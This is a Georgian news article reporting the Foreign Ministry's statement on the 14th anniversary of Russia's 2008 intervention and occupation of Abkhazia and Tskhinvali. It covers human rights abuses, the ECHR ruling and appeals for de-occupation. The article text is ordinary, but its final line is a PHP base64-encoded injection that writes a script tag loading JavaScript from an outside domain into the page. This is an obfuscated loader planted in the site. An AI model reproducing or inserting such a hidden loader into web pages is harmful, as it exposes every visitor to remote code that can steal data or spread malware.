celsiusi
ავერსი შნაიდერი
ოკუპაციის მე-14 წლისთავზე, რუსეთი არ ასრულებს ევროკავშირის შუამავლობით დადებულ 2008 წლის 12 აგვისტოს ცეცხლის შეწყვეტის შეთანხმებას და აფართოებს საკუთარ უკანონო კონტროლს ოკუპირებულ რეგიონებში, – ამის შესახებ საქართველოს საგარეო საქმეთა სამინისტროს მიერ გავრცელებულ განცხადებაშია აღნიშნული.
 
როგორც საგარეო უწყებაში აცხადებენ, საქართველოს აფხაზეთისა და ცხინვალის რეგიონებში ადამიანის ფუნდამენტური უფლებების უხეში შელახვა, ეთნიკური დისკრიმინაცია და ასობით ათასი იძულებით გადაადგილებული პირისა და ლტოლვილის საკუთარ სახლში დაბრუნების უფლების დარღვევა კვლავაც რჩება რუსეთის უკანონო ოკუპაციის მძიმე ჰუმანიტარულ ტვირთად.
 
„დღეს, 2022 წლის 7 აგვისტოს, სრულდება 14 წელი რუსეთის ფედერაციის მიერ საქართველოს წინააღმდეგ 2008 წელს განხორციელებული ღია სამხედრო ინტერვენციიდან, რასაც მოყვა რუსეთის მიერ საქართველოს განუყოფელი რეგიონების — აფხაზეთისა და ცხინვალის რეგიონის/სამხრეთ ოსეთის უკანონო ოკუპაცია და ე.წ. დამოუკიდებელ სახელმწიფოებად აღიარება. ოკუპაციის მე-14 წლისთავზე, რუსეთი არ ასრულებს ევროკავშირის შუამავლობით დადებულ 2008 წლის 12 აგვისტოს ცეცხლის შეწყვეტის შეთანხმებას და აფართოებს საკუთარ უკანონო კონტროლს ოკუპირებულ რეგიონებში. საოკუპაციო ხაზზე მავთულხლართებისა და სხვა ბარიერების აღმართვით, უკანონო დაკავებებითა და გატაცებებით, ადამიანის უფლებების უხეში შელახვით, ქართველთა ეთნიკური დისკრიმინაციით დარტყმას აყენებს ადგილზე უსაფრთხოების, ადამიანის უფლებებისა და ჰუმანიტარულ გარემოს, რითიც, სხვა მიზნებთან ერთად ცდილობს, ოკუპირებულ ტერიტორიებზე მცხოვრები ადამიანები იზოლაციაში მოაქციოს დანარჩენი საქართველოსგან და საერთაშორისო საზოგადოებისგან.
 
საქართველოს აფხაზეთისა და ცხინვალის რეგიონებში ადამიანის ფუნდამენტური უფლებების უხეში შელახვა, ეთნიკური დისკრიმინაცია და ასობით ათასი იძულებით გადაადგილებული პირისა და ლტოლვილის საკუთარ სახლში დაბრუნების უფლების დარღვევა კვლავაც რჩება რუსეთის უკანონო ოკუპაციის მძიმე ჰუმანიტარულ ტვირთად.  დავით ბაშარულის, გიგა ოთხოზორიას, არჩილ ტატუნაშვილის სიცოცხლის ხელყოფის საქმეებზე დაუსჯელობის წახალისება კი ზრდის ეთნიკურ ნიადაგზე ძალადობის საფრთხეს. ამ ფონზე კიდევ უფრო კრიტიკული ხდება ადგილზე ადამიანის უფლებათა დაცვის საერთაშორისო ორგანიზაციების შეუზღუდავი წვდომა და უსაფრთხოების საერთაშორისო მექანიზმების განლაგება, აგრეთვე ევროკავშირის სადამკვირვებლო მისიის შესვლას აფხაზეთისა და ცხინვალის რეგიონებში, მისიის მანდატის მიუხედავად, რასაც სამწუხაროდ აბრკოლებს საოკუპაციო ძალა.
 
ამ მძიმე ფონზე, გარდამტეხი როლი ჰქონდა 2021 წლის 21 იანვარს ევროპის ადამიანის უფლებათა სასამართლოს მიერ 2008 წლის რუსეთ-საქართველოს ომთან დაკავშირებით მიღებულ გადაწყვეტილებას, რომელშიც სამართლებრივად დადასტურდა რუსეთის ფედერაციის მიერ საქართველოს რეგიონების — აფხაზეთისა და ცხინვალის რეგიონის/სამხრეთ ოსეთის ოკუპაცია და მათზე ეფექტური კონტროლი და სწორედ რუსეთს დაეკისრა პასუხისმგელობა ადგილზე ადამიანის უფლებების და ძირითადი თავისუფლებების უხეში დარღვევის ფაქტებზე. აღნიშნული გადაწყვეტილება, რომელიც 2008 წლის რუსეთის-საქართველოს ომის პირველ სამართლებრივ შეფასებას წარმოადგენს, ცხადყოფს, რომ ამაოა რუსეთის ფედერაციის მრავალწლიანი მცდელობა, თავიდან აირიდოს სამართლებრივი პასუხისმგელობა უკანონო ოკუპაციასა და მის შედეგებზე. საქართველო განუხრელად განაგრძობს რუსეთ-საქართველოს კონფლიქტის მშვიდობიანი მოგვარების პოლიტიკის განხორციელებას და მოწადინებულია, რომ დიპლომატიური და სამართლებრივი ინსტრუმენტების გამოყენებით, საერთაშორისო პარტნიორებთან მჭიდრო თანამშრომლობით, შესაძლებელი გახადოს ქვეყნის გამთლიანება და მშვიდობიანი განვითარება, საოკუპაციო ხაზით გაყოფილ საზოგადოებებს შორის ნდობის აღდგენა და საერთო ევროპული მომავლის მშენებლობა.
 
საქართველო მადლიერია ქვეყნის სუვერენიტეტსა და ტერიტორიული მთლიანობისადმი საერთაშორისო თანამეგობრობის ურყევი მხარდაჭერისთვის და  დიდად აფასებს საერთაშორისო პარტნიორების წვლილს რუსეთ-საქართველოს კონფლიქტის მშვიდობიანი გადაწყვეტის პროცესში. აღნიშნული მხარდაჭერა განსაკუთრებულ მნიშვნელობას იძენს დღეს, როდესაც რუსეთი უკრაინის წინააღმდეგ სამხედრო აგრესიით, განაგრძობს უხეშ დარღვევას საერთაშორისო სამართლის პრინციპების და ძირს უთხრის ევროპის უსაფრთხოებას. საგარეო საქმეთა სამინისტრო მოუწოდებს რუსეთის ფედერაციას, შეწყვეტოს უკანონო და პროვოკაციული მოქმედებები საქართველოს წინააღმდეგ, პატივი სცეს საქართველოს სუვერენიტეტსა და ტერიტორიულ მთლიანობას, შეასრულოს ევროკავშირის წინაშე 2008 წლის 12 აგვისტოს ცეცხლის შეწყვეტის შეთანხმებით ნაკისრი ვალდებულებები, გაიყვანოს თავისი ძალები საქართველოს ტერიტორიიდან და შეცვალოს ოკუპირებული ტერიტორიების ე.წ. დამოუკიდებლობის აღიარების შესახებ უკანონო გადაწყვეტილება.
 
საგარეო საქმეთა სამინისტრო მიმართვას საერთაშორისო თანამეგობრობას, კონსოლიდირებული ძალისხმევა მიმართოს საქართველოს ტერიტორიების დეოკუპაციისა და იძულებით გადაადგილებულ პირთა და ლტოლვილთა საკუთარ სახლებში დაბრუნებისკენ და ქმედითი ნაბიჯები გადადგას საქართველოსა და მთლიანად რეგიონში მშვიდობისა და უსაფრთოხების უზრუნველსაყოფად. საგარეო საქმეთა სამინისტრო სარგებლობს შემთხვევით და სამძიმარს უცხადებს 2008 წლის ომში გმირულად დაღუპული  მებრძოლებისა და მშვიდობიანი მოსახლეობის ოჯახებსა და ახლობლებს“, – ნათქვამია საგარეო უწყების განცხადებაში.
558
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");